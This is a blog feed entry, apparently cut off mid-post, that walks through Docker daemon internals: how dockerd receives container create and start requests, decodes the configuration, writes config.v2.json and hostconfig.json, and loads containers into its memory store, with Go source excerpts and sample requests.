<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://u1f383.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://u1f383.github.io/" rel="alternate" type="text/html" /><updated>2026-06-04T07:55:41+00:00</updated><id>https://u1f383.github.io/feed.xml</id><title type="html">Blog</title><subtitle></subtitle><entry><title type="html">Docker Internal (3)</title><link href="https://u1f383.github.io/linux/2026/06/04/Docker-Internal-3.html" rel="alternate" type="text/html" title="Docker Internal (3)" /><published>2026-06-04T00:00:00+00:00</published><updated>2026-06-04T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/06/04/Docker-Internal-3</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/06/04/Docker-Internal-3.html"><![CDATA[<p>In the third post, we’ll discuss how the container is loaded.</p>

<p>Since the vulnerability I found has not yet been patched 😢, I won’t discuss how the NVIDIA toolkit can work as a replacement runtime in this post. I’ll cover it in a future post once the bug has been fixed.</p>

<p><img src="/assets/image-20260604000000000.png" alt="image-20260604000000000" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h2 id="1-load-a-container">1. Load a Container</h2>

<p>If you run <code class="language-plaintext highlighter-rouge">docker run --rm -it ubuntu:24.04</code>, <code class="language-plaintext highlighter-rouge">dockerd</code> will receive two HTTP requests. The first is to create a container, which is the same as executing <code class="language-plaintext highlighter-rouge">docker create ubuntu:24.04</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /v1.54/containers/create HTTP/1.1
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 1711
Content-Type: application/json
...
</code></pre></div></div>

<p>The second is to start the container, which is the same as executing <code class="language-plaintext highlighter-rouge">docker start &lt;container_id&gt;</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /v1.54/containers/17b7029c5b5121a40ef71d91640fff00f20152df0b167a4464c02450c208b8a1/start HTTP/1.1
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 0
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">dockerd</code>’s <code class="language-plaintext highlighter-rouge">initRoutes()</code> defines both endpoint handlers, and we’ll read their implementation later.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/container/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">initRoutes</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">c</span><span class="o">.</span><span class="n">routes</span> <span class="o">=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Route</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/containers/create"</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">postContainersCreate</span><span class="p">),</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/containers/{name:.*}/start"</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">postContainersStart</span><span class="p">),</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="11-create">1.1. Create</h3>

<p>The request data is a JSON-formatted data that includes the container’s configuration. The actual data looks like:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"Hostname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Domainname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
  </span><span class="nl">"User"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
  </span><span class="nl">"AttachStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
  </span><span class="nl">"AttachStdout"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
  </span><span class="nl">"AttachStderr"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Tty"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
  </span><span class="nl">"OpenStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
  </span><span class="nl">"StdinOnce"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Env"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Cmd"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Image"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ubuntu:24.04"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Volumes"</span><span class="p">:</span><span class="w"> </span><span class="p">{},</span><span class="w">
  </span><span class="nl">"WorkingDir"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Entrypoint"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Labels"</span><span class="p">:</span><span class="w"> </span><span class="p">{},</span><span class="w">
  </span><span class="nl">"HostConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"Binds"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ContainerIDFile"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"LogConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"Type"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Config"</span><span class="p">:</span><span class="w"> </span><span class="p">{}</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="nl">"NetworkMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">"default"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"PortBindings"</span><span class="p">:</span><span class="w"> </span><span class="p">{},</span><span class="w">
    </span><span class="nl">"RestartPolicy"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"Name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"no"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"MaximumRetryCount"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="nl">"AutoRemove"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"VolumeDriver"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"VolumesFrom"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ConsoleSize"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="mi">50</span><span class="p">,</span><span class="w">
      </span><span class="mi">212</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"CapAdd"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CapDrop"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CgroupnsMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Dns"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"DnsOptions"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"DnsSearch"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"ExtraHosts"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"GroupAdd"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"IpcMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Cgroup"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Links"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OomScoreAdj"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"PidMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Privileged"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"PublishAllPorts"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ReadonlyRootfs"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"SecurityOpt"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"UTSMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"UsernsMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ShmSize"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Isolation"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuShares"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Memory"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"NanoCpus"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CgroupParent"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"BlkioWeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"BlkioWeightDevice"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"BlkioDeviceReadBps"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"BlkioDeviceWriteBps"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"BlkioDeviceReadIOps"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"BlkioDeviceWriteIOps"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"CpuPeriod"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuQuota"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuRealtimePeriod"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuRealtimeRuntime"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpusetCpus"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpusetMems"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Devices"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"DeviceCgroupRules"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"DeviceRequests"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"MemoryReservation"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"MemorySwap"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"MemorySwappiness"</span><span class="p">:</span><span class="w"> </span><span class="mi">-1</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OomKillDisable"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"PidsLimit"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Ulimits"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"CpuCount"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuPercent"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"IOMaximumIOps"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"IOMaximumBandwidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"MaskedPaths"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ReadonlyPaths"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w">
  </span><span class="p">},</span><span class="w">
  </span><span class="nl">"NetworkingConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"EndpointsConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"default"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
        </span><span class="nl">"IPAMConfig"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
        </span><span class="nl">"Links"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
        </span><span class="nl">"Aliases"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
        </span><span class="nl">"DriverOpts"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
        </span><span class="nl">"GwPriority"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
        </span><span class="nl">"NetworkID"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"EndpointID"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"Gateway"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"IPAddress"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"MacAddress"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"IPPrefixLen"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
        </span><span class="nl">"IPv6Gateway"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"GlobalIPv6Address"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"GlobalIPv6PrefixLen"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
        </span><span class="nl">"DNSNames"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w">
      </span><span class="p">}</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">postContainersCreate()</code> first decodes the request into three different configs [1] and then creates a container based on these configs [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/container/container_routes.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">postContainersCreate</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">,</span> <span class="n">vars</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">req</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">runconfig</span><span class="o">.</span><span class="n">DecodeCreateRequest</span><span class="p">(</span><span class="n">rdr</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">RawSysInfo</span><span class="p">())</span>
    <span class="n">config</span><span class="p">,</span> <span class="n">hostConfig</span><span class="p">,</span> <span class="n">networkingConfig</span> <span class="o">:=</span> <span class="n">req</span><span class="o">.</span><span class="n">Config</span><span class="p">,</span> <span class="n">req</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">,</span> <span class="n">req</span><span class="o">.</span><span class="n">NetworkingConfig</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">ccr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">ContainerCreate</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">backend</span><span class="o">.</span><span class="n">ContainerCreateConfig</span><span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">Name</span><span class="o">:</span>                        <span class="n">name</span><span class="p">,</span>
        <span class="n">Config</span><span class="o">:</span>                      <span class="n">config</span><span class="p">,</span>
        <span class="n">HostConfig</span><span class="o">:</span>                  <span class="n">hostConfig</span><span class="p">,</span>
        <span class="n">NetworkingConfig</span><span class="o">:</span>            <span class="n">networkingConfig</span><span class="p">,</span>
        <span class="n">Platform</span><span class="o">:</span>                    <span class="n">platform</span><span class="p">,</span>
        <span class="n">DefaultReadOnlyNonRecursive</span><span class="o">:</span> <span class="n">defaultReadOnlyNonRecursive</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Internally, <code class="language-plaintext highlighter-rouge">newContainer()</code> is called to create a container instance and set its root directory to <code class="language-plaintext highlighter-rouge">/var/lib/docker/containers/&lt;id&gt;</code> [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">newContainer</span><span class="p">(</span><span class="n">name</span> <span class="kt">string</span><span class="p">,</span> <span class="n">platform</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Platform</span><span class="p">,</span> <span class="n">config</span> <span class="o">*</span><span class="n">containertypes</span><span class="o">.</span><span class="n">Config</span><span class="p">,</span> <span class="n">hostConfig</span> <span class="o">*</span><span class="n">containertypes</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">,</span> <span class="n">imgID</span> <span class="n">image</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span> <span class="n">managed</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">base</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">NewBaseContainer</span><span class="p">(</span><span class="n">id</span><span class="p">,</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">daemon</span><span class="o">.</span><span class="n">repository</span><span class="p">,</span> <span class="n">id</span><span class="p">))</span> <span class="c">// [3]</span>
    <span class="c">// [...]</span>
    <span class="n">base</span><span class="o">.</span><span class="n">Config</span> <span class="o">=</span> <span class="n">config</span>
    <span class="n">base</span><span class="o">.</span><span class="n">HostConfig</span> <span class="o">=</span> <span class="n">hostConfig</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">base</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After the container has been set up, its metadata is saved into <code class="language-plaintext highlighter-rouge">config.v2.json</code> for later use [4]. The host configuration is also saved, but it is kept separately in another file, <code class="language-plaintext highlighter-rouge">hostconfig.json</code> [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/container/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">container</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">CheckpointTo</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">store</span> <span class="o">*</span><span class="n">ViewDB</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">deepCopy</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">toDisk</span><span class="p">()</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">container</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">toDisk</span><span class="p">()</span> <span class="p">(</span><span class="o">*</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">pth</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">ConfigPath</span><span class="p">()</span> <span class="c">// config.v2.json</span>
    <span class="n">f</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">atomicwriter</span><span class="o">.</span><span class="n">New</span><span class="p">(</span><span class="n">pth</span><span class="p">,</span> <span class="m">0</span><span class="n">o600</span><span class="p">)</span>
    <span class="n">w</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">MultiWriter</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="n">f</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">NewEncoder</span><span class="p">(</span><span class="n">w</span><span class="p">)</span><span class="o">.</span><span class="n">Encode</span><span class="p">(</span><span class="n">container</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [4]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="k">var</span> <span class="n">deepCopy</span> <span class="n">Container</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">NewDecoder</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">)</span><span class="o">.</span><span class="n">Decode</span><span class="p">(</span><span class="o">&amp;</span><span class="n">deepCopy</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="n">deepCopy</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">container</span><span class="o">.</span><span class="n">WriteHostConfig</span><span class="p">()</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">container</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">WriteHostConfig</span><span class="p">()</span> <span class="p">(</span><span class="o">*</span><span class="n">containertypes</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">pth</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">HostConfigPath</span><span class="p">()</span> <span class="c">// hostconfig.json</span>
    <span class="n">f</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">atomicwriter</span><span class="o">.</span><span class="n">New</span><span class="p">(</span><span class="n">pth</span><span class="p">,</span> <span class="m">0</span><span class="n">o600</span><span class="p">)</span>
    <span class="n">w</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">MultiWriter</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="n">f</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">NewEncoder</span><span class="p">(</span><span class="n">w</span><span class="p">)</span><span class="o">.</span><span class="n">Encode</span><span class="p">(</span><span class="o">&amp;</span><span class="n">container</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We can see these files in the corresponding directory.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@aaa:~# <span class="nb">ls</span> <span class="nt">-al</span> /var/lib/docker/containers/2fa14c3b70546123aa4de5628bad07282085500fb48dee65adae4546b55b7128/
total 20
drwx--x--- 3 root root 4096 Jun  3 11:15 <span class="nb">.</span>
drwx--x--- 4 root root 4096 Jun  3 11:36 ..
drwx------ 2 root root 4096 Jun  3 11:15 checkpoints
<span class="nt">-rw-------</span> 1 root root 2462 Jun  3 11:15 config.v2.json
<span class="nt">-rw-------</span> 1 root root 1216 Jun  3 11:15 hostconfig.json
</code></pre></div></div>

<p>These configs are loaded and used from <code class="language-plaintext highlighter-rouge">dockerd</code>’s memory store [6], which is a mapping from container’s ID to the container object.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/daemon.go</span>
<span class="k">type</span> <span class="n">Daemon</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="c">// [..]</span>
    <span class="n">containers</span>        <span class="n">container</span><span class="o">.</span><span class="n">Store</span> <span class="c">// [6]</span>
    <span class="c">// [..]</span>
<span class="p">}</span>

<span class="c">// daemon/container/memory_store.go</span>
<span class="k">type</span> <span class="n">memoryStore</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">s</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="o">*</span><span class="n">Container</span>
    <span class="n">sync</span><span class="o">.</span><span class="n">RWMutex</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Every time <code class="language-plaintext highlighter-rouge">dockerd</code> restarts, the initialization function <code class="language-plaintext highlighter-rouge">NewDaemon()</code> calls <code class="language-plaintext highlighter-rouge">loadContainers()</code> [7] to cache all of them into the memory store to avoid heavy disk access.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/daemon.go</span>
<span class="k">func</span> <span class="n">NewDaemon</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">config</span> <span class="o">*</span><span class="n">config</span><span class="o">.</span><span class="n">Config</span><span class="p">,</span> <span class="n">pluginStore</span> <span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">Store</span><span class="p">,</span> <span class="n">authzMiddleware</span> <span class="o">*</span><span class="n">authorization</span><span class="o">.</span><span class="n">Middleware</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">containers</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">d</span><span class="o">.</span><span class="n">loadContainers</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [7]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

